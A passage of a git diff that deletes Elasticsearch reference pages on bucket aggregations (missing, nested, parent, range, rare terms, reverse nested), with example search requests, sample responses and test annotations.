TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] diff --git a/docs/reference/aggregations/bucket/missing-aggregation.asciidoc b/docs/reference/aggregations/bucket/missing-aggregation.asciidoc deleted file mode 100644 index 6c43e2ce49f..00000000000 --- a/docs/reference/aggregations/bucket/missing-aggregation.asciidoc +++ /dev/null @@ -1,39 +0,0 @@ -[[search-aggregations-bucket-missing-aggregation]] -=== Missing aggregation -++++ -Missing -++++ - -A field data based single bucket aggregation, that creates a bucket of all documents in the current document set context that are missing a field value (effectively, missing a field or having the configured NULL value set). This aggregator will often be used in conjunction with other field data bucket aggregators (such as ranges) to return information for all the documents that could not be placed in any of the other buckets due to missing field data values. - -Example: - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "products_without_a_price": { - "missing": { "field": "price" } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -In the above example, we get the total number of products that do not have a price. - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "products_without_a_price": { - "doc_count": 00 - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] \ No newline at end of file diff --git a/docs/reference/aggregations/bucket/nested-aggregation.asciidoc b/docs/reference/aggregations/bucket/nested-aggregation.asciidoc deleted file mode 100644 index b45da2c1a09..00000000000 --- a/docs/reference/aggregations/bucket/nested-aggregation.asciidoc +++ /dev/null @@ -1,99 +0,0 @@ -[[search-aggregations-bucket-nested-aggregation]] -=== Nested aggregation -++++ -Nested -++++ - -A special single bucket aggregation that enables aggregating nested documents. - -For example, lets say we have an index of products, and each product holds the list of resellers - each having its own -price for the product. The mapping could look like: - -[source,console] --------------------------------------------------- -PUT /products -{ - "mappings": { - "properties": { - "resellers": { <1> - "type": "nested", - "properties": { - "reseller": { "type": "text" }, - "price": { "type": "double" } - } - } - } - } -} --------------------------------------------------- -<1> `resellers` is an array that holds nested documents. - -The following request adds a product with two resellers: - -[source,console] --------------------------------------------------- -PUT /products/_doc/0 -{ - "name": "LED TV", <1> - "resellers": [ - { - "reseller": "companyA", - "price": 350 - }, - { - "reseller": "companyB", - "price": 500 - } - ] -} --------------------------------------------------- -// TEST[s/PUT \/products\/_doc\/0/PUT \/products\/_doc\/0\?refresh/] -// TEST[continued] -<1> We are using a dynamic mapping for the `name` attribute. - - -The following request returns the minimum price a product can be purchased for: - -[source,console] --------------------------------------------------- -GET /products/_search -{ - "query": { - "match": { "name": "led tv" } - }, - "aggs": { - "resellers": { - "nested": { - "path": "resellers" - }, - "aggs": { - "min_price": { "min": { "field": "resellers.price" } } - } - } - } -} --------------------------------------------------- -// TEST[s/GET \/products\/_search/GET \/products\/_search\?filter_path=aggregations/] -// TEST[continued] - -As you can see above, the nested aggregation requires the `path` of the nested documents within the top level documents. -Then one can define any type of aggregation over these nested documents. - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "resellers": { - "doc_count": 2, - "min_price": { - "value": 350 - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\.//] -// TESTRESPONSE[s/: [0-9]+/: $body.$_path/] diff --git a/docs/reference/aggregations/bucket/parent-aggregation.asciidoc b/docs/reference/aggregations/bucket/parent-aggregation.asciidoc deleted file mode 100644 index 29892be17dc..00000000000 --- a/docs/reference/aggregations/bucket/parent-aggregation.asciidoc +++ /dev/null @@ -1,213 +0,0 @@ -[[search-aggregations-bucket-parent-aggregation]] -=== Parent aggregation -++++ -Parent -++++ - -A special single bucket aggregation that selects parent documents that have the specified type, as defined in a <>. - -This aggregation has a single option: - -* `type` - The child type that should be selected. - -For example, let's say we have an index of questions and answers. The answer type has the following `join` field in the mapping: - -[source,console] --------------------------------------------------- -PUT parent_example -{ - "mappings": { - "properties": { - "join": { - "type": "join", - "relations": { - "question": "answer" - } - } - } - } -} --------------------------------------------------- - -The `question` document contain a tag field and the `answer` documents contain an owner field. With the `parent` -aggregation the owner buckets can be mapped to the tag buckets in a single request even though the two fields exist in -two different kinds of documents. - -An example of a question document: - -[source,console] --------------------------------------------------- -PUT parent_example/_doc/1 -{ - "join": { - "name": "question" - }, - "body": "

I have Windows 2003 server and i bought a new Windows 2008 server...", - "title": "Whats the best way to file transfer my site from server to a newer one?", - "tags": [ - "windows-server-2003", - "windows-server-2008", - "file-transfer" - ] -} --------------------------------------------------- -// TEST[continued] - -Examples of `answer` documents: - -[source,console] --------------------------------------------------- -PUT parent_example/_doc/2?routing=1 -{ - "join": { - "name": "answer", - "parent": "1" - }, - "owner": { - "location": "Norfolk, United Kingdom", - "display_name": "Sam", - "id": 48 - }, - "body": "

Unfortunately you're pretty much limited to FTP...", - "creation_date": "2009-05-04T13:45:37.030" -} - -PUT parent_example/_doc/3?routing=1&refresh -{ - "join": { - "name": "answer", - "parent": "1" - }, - "owner": { - "location": "Norfolk, United Kingdom", - "display_name": "Troll", - "id": 49 - }, - "body": "

Use Linux...", - "creation_date": "2009-05-05T13:45:37.030" -} --------------------------------------------------- -// TEST[continued] - -The following request can be built that connects the two together: - -[source,console] --------------------------------------------------- -POST parent_example/_search?size=0 -{ - "aggs": { - "top-names": { - "terms": { - "field": "owner.display_name.keyword", - "size": 10 - }, - "aggs": { - "to-questions": { - "parent": { - "type" : "answer" <1> - }, - "aggs": { - "top-tags": { - "terms": { - "field": "tags.keyword", - "size": 10 - } - } - } - } - } - } - } -} --------------------------------------------------- -// TEST[continued] - -<1> The `type` points to type / mapping with the name `answer`. - -The above example returns the top answer owners and per owner the top question tags. - -Possible response: - -[source,console-result] --------------------------------------------------- -{ - "took": 9, - "timed_out": false, - "_shards": { - "total": 1, - "successful": 1, - "skipped": 0, - "failed": 0 - }, - "hits": { - "total" : { - "value": 3, - "relation": "eq" - }, - "max_score": null, - "hits": [] - }, - "aggregations": { - "top-names": { - "doc_count_error_upper_bound": 0, - "sum_other_doc_count": 0, - "buckets": [ - { - "key": "Sam", - "doc_count": 1, <1> - "to-questions": { - "doc_count": 1, <2> - "top-tags": { - "doc_count_error_upper_bound": 0, - "sum_other_doc_count": 0, - "buckets": [ - { - "key": "file-transfer", - "doc_count": 1 - }, - { - "key": "windows-server-2003", - "doc_count": 1 - }, - { - "key": "windows-server-2008", - "doc_count": 1 - } - ] - } - } - }, - { - "key": "Troll", - "doc_count": 1, - "to-questions": { - "doc_count": 1, - "top-tags": { - "doc_count_error_upper_bound": 0, - "sum_other_doc_count": 0, - "buckets": [ - { - "key": "file-transfer", - "doc_count": 1 - }, - { - "key": "windows-server-2003", - "doc_count": 1 - }, - { - "key": "windows-server-2008", - "doc_count": 1 - } - ] - } - } - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 9/"took": $body.took/] - -<1> The number of answer documents with the tag `Sam`, `Troll`, etc. -<2> The number of question documents that are related to answer documents with the tag `Sam`, `Troll`, etc. diff --git a/docs/reference/aggregations/bucket/range-aggregation.asciidoc b/docs/reference/aggregations/bucket/range-aggregation.asciidoc deleted file mode 100644 index 3dc58721eae..00000000000 --- a/docs/reference/aggregations/bucket/range-aggregation.asciidoc +++ /dev/null @@ -1,384 +0,0 @@ -[[search-aggregations-bucket-range-aggregation]] -=== Range aggregation -++++ -Range -++++ - -A multi-bucket value source based aggregation that enables the user to define a set of ranges - each representing a bucket. During the aggregation process, the values extracted from each document will be checked against each bucket range and "bucket" the relevant/matching document. -Note that this aggregation includes the `from` value and excludes the `to` value for each range. - -Example: - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "price_ranges": { - "range": { - "field": "price", - "ranges": [ - { "to": 100.0 }, - { "from": 100.0, "to": 200.0 }, - { "from": 200.0 } - ] - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] -// TEST[s/GET \/_search/GET \/_search\?filter_path=aggregations/] - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "price_ranges": { - "buckets": [ - { - "key": "*-100.0", - "to": 100.0, - "doc_count": 2 - }, - { - "key": "100.0-200.0", - "from": 100.0, - "to": 200.0, - "doc_count": 2 - }, - { - "key": "200.0-*", - "from": 200.0, - "doc_count": 3 - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\.//] - -==== Keyed Response - -Setting the `keyed` flag to `true` will associate a unique string key with each bucket and return the ranges as a hash rather than an array: - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "price_ranges": { - "range": { - "field": "price", - "keyed": true, - "ranges": [ - { "to": 100 }, - { "from": 100, "to": 200 }, - { "from": 200 } - ] - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] -// TEST[s/GET \/_search/GET \/_search\?filter_path=aggregations/] - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "price_ranges": { - "buckets": { - "*-100.0": { - "to": 100.0, - "doc_count": 2 - }, - "100.0-200.0": { - "from": 100.0, - "to": 200.0, - "doc_count": 2 - }, - "200.0-*": { - "from": 200.0, - "doc_count": 3 - } - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\.//] - -It is also possible to customize the key for each range: - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "price_ranges": { - "range": { - "field": "price", - "keyed": true, - "ranges": [ - { "key": "cheap", "to": 100 }, - { "key": "average", "from": 100, "to": 200 }, - { "key": "expensive", "from": 200 } - ] - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] -// TEST[s/GET \/_search/GET \/_search\?filter_path=aggregations/] - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "price_ranges": { - "buckets": { - "cheap": { - "to": 100.0, - "doc_count": 2 - }, - "average": { - "from": 100.0, - "to": 200.0, - "doc_count": 2 - }, - "expensive": { - "from": 200.0, - "doc_count": 3 - } - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\.//] - -==== Script - -Range aggregation accepts a `script` parameter. This parameter allows to defined an inline `script` that -will be executed during aggregation execution. - -The following example shows how to use an `inline` script with the `painless` script language and no script parameters: - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "price_ranges": { - "range": { - "script": { - "lang": "painless", - "source": "doc['price'].value" - }, - "ranges": [ - { "to": 100 }, - { "from": 100, "to": 200 }, - { "from": 200 } - ] - } - } - } -} --------------------------------------------------- - -It is also possible to use stored scripts. Here is a simple stored script: - -[source,console] --------------------------------------------------- -POST /_scripts/convert_currency -{ - "script": { - "lang": "painless", - "source": "doc[params.field].value * params.conversion_rate" - } -} --------------------------------------------------- -// TEST[setup:sales] - -And this new stored script can be used in the range aggregation like this: - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "price_ranges": { - "range": { - "script": { - "id": "convert_currency", <1> - "params": { <2> - "field": "price", - "conversion_rate": 0.835526591 - } - }, - "ranges": [ - { "from": 0, "to": 100 }, - { "from": 100 } - ] - } - } - } -} --------------------------------------------------- -// TEST[s/GET \/_search/GET \/_search\?filter_path=aggregations/] -// TEST[continued] -<1> Id of the stored script -<2> Parameters to use when executing the stored script - -////////////////////////// - -[source,console-result] --------------------------------------------------- -{ - "aggregations": { - "price_ranges": { - "buckets": [ - { - "key": "0.0-100.0", - "from": 0.0, - "to": 100.0, - "doc_count": 2 - }, - { - "key": "100.0-*", - "from": 100.0, - "doc_count": 5 - } - ] - } - } -} --------------------------------------------------- - -////////////////////////// - -==== Value Script - -Lets say the product prices are in USD but we would like to get the price ranges in EURO. We can use value script to convert the prices prior the aggregation (assuming conversion rate of 0.8) - -[source,console] --------------------------------------------------- -GET /sales/_search -{ - "aggs": { - "price_ranges": { - "range": { - "field": "price", - "script": { - "source": "_value * params.conversion_rate", - "params": { - "conversion_rate": 0.8 - } - }, - "ranges": [ - { "to": 35 }, - { "from": 35, "to": 70 }, - { "from": 70 } - ] - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -==== Sub Aggregations - -The following example, not only "bucket" the documents to the different buckets but also computes statistics over the prices in each price range - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "price_ranges": { - "range": { - "field": "price", - "ranges": [ - { "to": 100 }, - { "from": 100, "to": 200 }, - { "from": 200 } - ] - }, - "aggs": { - "price_stats": { - "stats": { "field": "price" } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] -// TEST[s/GET \/_search/GET \/_search\?filter_path=aggregations/] - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "price_ranges": { - "buckets": [ - { - "key": "*-100.0", - "to": 100.0, - "doc_count": 2, - "price_stats": { - "count": 2, - "min": 10.0, - "max": 50.0, - "avg": 30.0, - "sum": 60.0 - } - }, - { - "key": "100.0-200.0", - "from": 100.0, - "to": 200.0, - "doc_count": 2, - "price_stats": { - "count": 2, - "min": 150.0, - "max": 175.0, - "avg": 162.5, - "sum": 325.0 - } - }, - { - "key": "200.0-*", - "from": 200.0, - "doc_count": 3, - "price_stats": { - "count": 3, - "min": 200.0, - "max": 200.0, - "avg": 200.0, - "sum": 600.0 - } - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\.//] diff --git a/docs/reference/aggregations/bucket/range-field-note.asciidoc b/docs/reference/aggregations/bucket/range-field-note.asciidoc deleted file mode 100644 index 78841760f6a..00000000000 --- a/docs/reference/aggregations/bucket/range-field-note.asciidoc +++ /dev/null @@ -1,190 +0,0 @@ -[[search-aggregations-bucket-range-field-note]] -=== Subtleties of bucketing range fields - -==== Documents are counted for each bucket they land in - -Since a range represents multiple values, running a bucket aggregation over a -range field can result in the same document landing in multiple buckets. This -can lead to surprising behavior, such as the sum of bucket counts being higher -than the number of matched documents. For example, consider the following -index: -[source, console] --------------------------------------------------- -PUT range_index -{ - "settings": { - "number_of_shards": 2 - }, - "mappings": { - "properties": { - "expected_attendees": { - "type": "integer_range" - }, - "time_frame": { - "type": "date_range", - "format": "yyyy-MM-dd||epoch_millis" - } - } - } -} - -PUT range_index/_doc/1?refresh -{ - "expected_attendees" : { - "gte" : 10, - "lte" : 20 - }, - "time_frame" : { - "gte" : "2019-10-28", - "lte" : "2019-11-04" - } -} --------------------------------------------------- -// TESTSETUP - -The range is wider than the interval in the following aggregation, and thus the -document will land in multiple buckets. - -[source, console] --------------------------------------------------- -POST /range_index/_search?size=0 -{ - "aggs": { - "range_histo": { - "histogram": { - "field": "expected_attendees", - "interval": 5 - } - } - } -} --------------------------------------------------- - -Since the interval is `5` (and the offset is `0` by default), we expect buckets `10`, -`15`, and `20`. Our range document will fall in all three of these buckets. - -[source, console-result] --------------------------------------------------- -{ - ... - "aggregations" : { - "range_histo" : { - "buckets" : [ - { - "key" : 10.0, - "doc_count" : 1 - }, - { - "key" : 15.0, - "doc_count" : 1 - }, - { - "key" : 20.0, - "doc_count" : 1 - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -A document cannot exist partially in a bucket; For example, the above document -cannot count as one-third in each of the above three buckets. In this example, -since the document's range landed in multiple buckets, the full value of that -document would also be counted in any sub-aggregations for each bucket as well. - -==== Query bounds are not aggregation filters - -Another unexpected behavior can arise when a query is used to filter on the -field being aggregated. In this case, a document could match the query but -still have one or both of the endpoints of the range outside the query. -Consider the following aggregation on the above document: - -[source, console] --------------------------------------------------- -POST /range_index/_search?size=0 -{ - "query": { - "range": { - "time_frame": { - "gte": "2019-11-01", - "format": "yyyy-MM-dd" - } - } - }, - "aggs": { - "november_data": { - "date_histogram": { - "field": "time_frame", - "calendar_interval": "day", - "format": "yyyy-MM-dd" - } - } - } -} --------------------------------------------------- - -Even though the query only considers days in November, the aggregation -generates 8 buckets (4 in October, 4 in November) because the aggregation is -calculated over the ranges of all matching documents. - -[source, console-result] --------------------------------------------------- -{ - ... - "aggregations" : { - "november_data" : { - "buckets" : [ - { - "key_as_string" : "2019-10-28", - "key" : 1572220800000, - "doc_count" : 1 - }, - { - "key_as_string" : "2019-10-29", - "key" : 1572307200000, - "doc_count" : 1 - }, - { - "key_as_string" : "2019-10-30", - "key" : 1572393600000, - "doc_count" : 1 - }, - { - "key_as_string" : "2019-10-31", - "key" : 1572480000000, - "doc_count" : 1 - }, - { - "key_as_string" : "2019-11-01", - "key" : 1572566400000, - "doc_count" : 1 - }, - { - "key_as_string" : "2019-11-02", - "key" : 1572652800000, - "doc_count" : 1 - }, - { - "key_as_string" : "2019-11-03", - "key" : 1572739200000, - "doc_count" : 1 - }, - { - "key_as_string" : "2019-11-04", - "key" : 1572825600000, - "doc_count" : 1 - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -Depending on the use case, a `CONTAINS` query could limit the documents to only -those that fall entirely in the queried range. In this example, the one -document would not be included and the aggregation would be empty. Filtering -the buckets after the aggregation is also an option, for use cases where the -document should be counted but the out of bounds data can be safely ignored. diff --git a/docs/reference/aggregations/bucket/rare-terms-aggregation.asciidoc b/docs/reference/aggregations/bucket/rare-terms-aggregation.asciidoc deleted file mode 100644 index ae224e4fac2..00000000000 --- a/docs/reference/aggregations/bucket/rare-terms-aggregation.asciidoc +++ /dev/null @@ -1,355 +0,0 @@ -[[search-aggregations-bucket-rare-terms-aggregation]] -=== Rare terms aggregation -++++ -Rare terms -++++ - -A multi-bucket value source based aggregation which finds "rare" terms -- terms that are at the long-tail -of the distribution and are not frequent. Conceptually, this is like a `terms` aggregation that is -sorted by `_count` ascending. As noted in the <>, -actually ordering a `terms` agg by count ascending has unbounded error. Instead, you should use the `rare_terms` -aggregation - -////////////////////////// - -[source,js] --------------------------------------------------- -PUT /products -{ - "mappings": { - "properties": { - "genre": { - "type": "keyword" - }, - "product": { - "type": "keyword" - } - } - } -} - -POST /products/_doc/_bulk?refresh -{"index":{"_id":0}} -{"genre": "rock", "product": "Product A"} -{"index":{"_id":1}} -{"genre": "rock"} -{"index":{"_id":2}} -{"genre": "rock"} -{"index":{"_id":3}} -{"genre": "jazz", "product": "Product Z"} -{"index":{"_id":4}} -{"genre": "jazz"} -{"index":{"_id":5}} -{"genre": "electronic"} -{"index":{"_id":6}} -{"genre": "electronic"} -{"index":{"_id":7}} -{"genre": "electronic"} -{"index":{"_id":8}} -{"genre": "electronic"} -{"index":{"_id":9}} -{"genre": "electronic"} -{"index":{"_id":10}} -{"genre": "swing"} - -------------------------------------------------- -// NOTCONSOLE -// TESTSETUP - -////////////////////////// - -==== Syntax - -A `rare_terms` aggregation looks like this in isolation: - -[source,js] --------------------------------------------------- -{ - "rare_terms": { - "field": "the_field", - "max_doc_count": 1 - } -} --------------------------------------------------- -// NOTCONSOLE - -.`rare_terms` Parameters -|=== -|Parameter Name |Description |Required |Default Value -|`field` |The field we wish to find rare terms in |Required | -|`max_doc_count` |The maximum number of documents a term should appear in. |Optional |`1` -|`precision` |The precision of the internal CuckooFilters. Smaller precision leads to -better approximation, but higher memory usage. Cannot be smaller than `0.00001` |Optional |`0.01` -|`include` |Terms that should be included in the aggregation|Optional | -|`exclude` |Terms that should be excluded from the aggregation|Optional | -|`missing` |The value that should be used if a document does not have the field being aggregated|Optional | -|=== - - -Example: - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "genres": { - "rare_terms": { - "field": "genre" - } - } - } -} --------------------------------------------------- -// TEST[s/_search/_search\?filter_path=aggregations/] - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "genres": { - "buckets": [ - { - "key": "swing", - "doc_count": 1 - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\.//] - -In this example, the only bucket that we see is the "swing" bucket, because it is the only term that appears in -one document. If we increase the `max_doc_count` to `2`, we'll see some more buckets: - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "genres": { - "rare_terms": { - "field": "genre", - "max_doc_count": 2 - } - } - } -} --------------------------------------------------- -// TEST[s/_search/_search\?filter_path=aggregations/] - -This now shows the "jazz" term which has a `doc_count` of 2": - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "genres": { - "buckets": [ - { - "key": "swing", - "doc_count": 1 - }, - { - "key": "jazz", - "doc_count": 2 - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\.//] - -[[search-aggregations-bucket-rare-terms-aggregation-max-doc-count]] -==== Maximum document count - -The `max_doc_count` parameter is used to control the upper bound of document counts that a term can have. There -is not a size limitation on the `rare_terms` agg like `terms` agg has. This means that terms -which match the `max_doc_count` criteria will be returned. The aggregation functions in this manner to avoid -the order-by-ascending issues that afflict the `terms` aggregation. - -This does, however, mean that a large number of results can be returned if chosen incorrectly. -To limit the danger of this setting, the maximum `max_doc_count` is 100. - -[[search-aggregations-bucket-rare-terms-aggregation-max-buckets]] -==== Max Bucket Limit - -The Rare Terms aggregation is more liable to trip the `search.max_buckets` soft limit than other aggregations due -to how it works. The `max_bucket` soft-limit is evaluated on a per-shard basis while the aggregation is collecting -results. It is possible for a term to be "rare" on a shard but become "not rare" once all the shard results are -merged together. This means that individual shards tend to collect more buckets than are truly rare, because -they only have their own local view. This list is ultimately pruned to the correct, smaller list of rare -terms on the coordinating node... but a shard may have already tripped the `max_buckets` soft limit and aborted -the request. - -When aggregating on fields that have potentially many "rare" terms, you may need to increase the `max_buckets` soft -limit. Alternatively, you might need to find a way to filter the results to return fewer rare values (smaller time -span, filter by category, etc), or re-evaluate your definition of "rare" (e.g. if something -appears 100,000 times, is it truly "rare"?) - -[[search-aggregations-bucket-rare-terms-aggregation-approximate-counts]] -==== Document counts are approximate - -The naive way to determine the "rare" terms in a dataset is to place all the values in a map, incrementing counts -as each document is visited, then return the bottom `n` rows. This does not scale beyond even modestly sized data -sets. A sharded approach where only the "top n" values are retained from each shard (ala the `terms` aggregation) -fails because the long-tail nature of the problem means it is impossible to find the "top n" bottom values without -simply collecting all the values from all shards. - -Instead, the Rare Terms aggregation uses a different approximate algorithm: - -1. Values are placed in a map the first time they are seen. -2. Each addition occurrence of the term increments a counter in the map -3. If the counter > the `max_doc_count` threshold, the term is removed from the map and placed in a -https://www.cs.cmu.edu/~dga/papers/cuckoo-conext2014.pdf[CuckooFilter] -4. The CuckooFilter is consulted on each term. If the value is inside the filter, it is known to be above the -threshold already and skipped. - -After execution, the map of values is the map of "rare" terms under the `max_doc_count` threshold. This map and CuckooFilter -are then merged with all other shards. If there are terms that are greater than the threshold (or appear in -a different shard's CuckooFilter) the term is removed from the merged list. The final map of values is returned -to the user as the "rare" terms. - -CuckooFilters have the possibility of returning false positives (they can say a value exists in their collection when -it actually does not). Since the CuckooFilter is being used to see if a term is over threshold, this means a false positive -from the CuckooFilter will mistakenly say a value is common when it is not (and thus exclude it from it final list of buckets). -Practically, this means the aggregations exhibits false-negative behavior since the filter is being used "in reverse" -of how people generally think of approximate set membership sketches. - -CuckooFilters are described in more detail in the paper: - -https://www.cs.cmu.edu/~dga/papers/cuckoo-conext2014.pdf[Fan, Bin, et al. "Cuckoo filter: Practically better than bloom."] -Proceedings of the 10th ACM International on Conference on emerging Networking Experiments and Technologies. ACM, 2014. - -==== Precision - -Although the internal CuckooFilter is approximate in nature, the false-negative rate can be controlled with a -`precision` parameter. This allows the user to trade more runtime memory for more accurate results. - -The default precision is `0.001`, and the smallest (e.g. most accurate and largest memory overhead) is `0.00001`. -Below are some charts which demonstrate how the accuracy of the aggregation is affected by precision and number -of distinct terms. - -The X-axis shows the number of distinct values the aggregation has seen, and the Y-axis shows the percent error. -Each line series represents one "rarity" condition (ranging from one rare item to 100,000 rare items). For example, -the orange "10" line means ten of the values were "rare" (`doc_count == 1`), out of 1-20m distinct values (where the -rest of the values had `doc_count > 1`) - -This first chart shows precision `0.01`: - -image:images/rare_terms/accuracy_01.png[] - -And precision `0.001` (the default): - -image:images/rare_terms/accuracy_001.png[] - -And finally `precision 0.0001`: - -image:images/rare_terms/accuracy_0001.png[] - -The default precision of `0.001` maintains an accuracy of < 2.5% for the tested conditions, and accuracy slowly -degrades in a controlled, linear fashion as the number of distinct values increases. - -The default precision of `0.001` has a memory profile of `1.748⁻⁶ * n` bytes, where `n` is the number -of distinct values the aggregation has seen (it can also be roughly eyeballed, e.g. 20 million unique values is about -30mb of memory). The memory usage is linear to the number of distinct values regardless of which precision is chosen, -the precision only affects the slope of the memory profile as seen in this chart: - -image:images/rare_terms/memory.png[] - -For comparison, an equivalent terms aggregation at 20 million buckets would be roughly -`20m * 69b == ~1.38gb` (with 69 bytes being a very optimistic estimate of an empty bucket cost, far lower than what -the circuit breaker accounts for). So although the `rare_terms` agg is relatively heavy, it is still orders of -magnitude smaller than the equivalent terms aggregation - -==== Filtering Values - -It is possible to filter the values for which buckets will be created. This can be done using the `include` and -`exclude` parameters which are based on regular expression strings or arrays of exact values. Additionally, -`include` clauses can filter using `partition` expressions. - -===== Filtering Values with regular expressions - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "genres": { - "rare_terms": { - "field": "genre", - "include": "swi*", - "exclude": "electro*" - } - } - } -} --------------------------------------------------- - -In the above example, buckets will be created for all the tags that starts with `swi`, except those starting -with `electro` (so the tag `swing` will be aggregated but not `electro_swing`). The `include` regular expression will determine what -values are "allowed" to be aggregated, while the `exclude` determines the values that should not be aggregated. When -both are defined, the `exclude` has precedence, meaning, the `include` is evaluated first and only then the `exclude`. - -The syntax is the same as <>. - -===== Filtering Values with exact values - -For matching based on exact values the `include` and `exclude` parameters can simply take an array of -strings that represent the terms as they are found in the index: - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "genres": { - "rare_terms": { - "field": "genre", - "include": [ "swing", "rock" ], - "exclude": [ "jazz" ] - } - } - } -} --------------------------------------------------- - - -==== Missing value - -The `missing` parameter defines how documents that are missing a value should be treated. -By default they will be ignored but it is also possible to treat them as if they -had a value. - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "genres": { - "rare_terms": { - "field": "genre", - "missing": "N/A" <1> - } - } - } -} --------------------------------------------------- - -<1> Documents without a value in the `tags` field will fall into the same bucket as documents that have the value `N/A`. - -==== Nested, RareTerms, and scoring sub-aggregations - -The RareTerms aggregation has to operate in `breadth_first` mode, since it needs to prune terms as doc count thresholds -are breached. This requirement means the RareTerms aggregation is incompatible with certain combinations of aggregations -that require `depth_first`. In particular, scoring sub-aggregations that are inside a `nested` force the entire aggregation tree to run -in `depth_first` mode. This will throw an exception since RareTerms is unable to process `depth_first`. - -As a concrete example, if `rare_terms` aggregation is the child of a `nested` aggregation, and one of the child aggregations of `rare_terms` -needs document scores (like a `top_hits` aggregation), this will throw an exception. \ No newline at end of file diff --git a/docs/reference/aggregations/bucket/reverse-nested-aggregation.asciidoc b/docs/reference/aggregations/bucket/reverse-nested-aggregation.asciidoc deleted file mode 100644 index da0026ab14b..00000000000 --- a/docs/reference/aggregations/bucket/reverse-nested-aggregation.asciidoc +++ /dev/null @@ -1,139 +0,0 @@ -[[search-aggregations-bucket-reverse-nested-aggregation]] -=== Reverse nested aggregation -++++ -Reverse nested -++++ - -A special single bucket aggregation that enables aggregating on parent docs from nested documents. Effectively this -aggregation can break out of the nested block structure and link to other nested structures or the root document, -which allows nesting other aggregations that aren't part of the nested object in a nested aggregation. - -The `reverse_nested` aggregation must be defined inside a `nested` aggregation. - -.Options: -* `path` - Which defines to what nested object field should be joined back. The default is empty, -which means that it joins back to the root / main document level. The path cannot contain a reference to -a nested object field that falls outside the `nested` aggregation's nested structure a `reverse_nested` is in. - -For example, lets say we have an index for a ticket system with issues and comments. The comments are inlined into -the issue documents as nested documents. The mapping could look like: - -[source,console] --------------------------------------------------- -PUT /issues -{ - "mappings": { - "properties": { - "tags": { "type": "keyword" }, - "comments": { <1> - "type": "nested", - "properties": { - "username": { "type": "keyword" }, - "comment": { "type": "text" } - } - } - } - } -} --------------------------------------------------- - -<1> The `comments` is an array that holds nested documents under the `issue` object. - -The following aggregations will return the top commenters' username that have commented and per top commenter the top -tags of the issues the user has commented on: - -////////////////////////// - -[source,console] --------------------------------------------------- -POST /issues/_doc/0?refresh -{"tags": ["tag_1"], "comments": [{"username": "username_1"}]} --------------------------------------------------- -// TEST[continued] - -////////////////////////// - -[source,console] --------------------------------------------------- -GET /issues/_search -{ - "query": { - "match_all": {} - }, - "aggs": { - "comments": { - "nested": { - "path": "comments" - }, - "aggs": { - "top_usernames": { - "terms": { - "field": "comments.username" - }, - "aggs": { - "comment_to_issue": { - "reverse_nested": {}, <1> - "aggs": { - "top_tags_per_comment": { - "terms": { - "field": "tags" - } - } - } - } - } - } - } - } - } -} --------------------------------------------------- -// TEST[continued] -// TEST[s/_search/_search\?filter_path=aggregations/] - -As you can see above, the `reverse_nested` aggregation is put in to a `nested` aggregation as this is the only place -in the dsl where the `reverse_nested` aggregation can be used. Its sole purpose is to join back to a parent doc higher -up in the nested structure. - -<1> A `reverse_nested` aggregation that joins back to the root / main document level, because no `path` has been defined. -Via the `path` option the `reverse_nested` aggregation can join back to a different level, if multiple layered nested -object types have been defined in the mapping - -Possible response snippet: - -[source,console-result] --------------------------------------------------- -{ - "aggregations": { - "comments": { - "doc_count": 1, - "top_usernames": { - "doc_count_error_upper_bound" : 0, - "sum_other_doc_count" : 0, - "buckets": [ - { - "key": "username_1", - "doc_count": 1, - "comment_to_issue": { - "doc_count": 1, - "top_tags_per_comment": { - "doc_count_error_upper_bound" : 0, - "sum_other_doc_count" : 0, - "buckets": [ - { - "key": "tag_1", - "doc_count": 1 - } - ... - ] - } - } - } - ... - ] - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\.//] diff --git 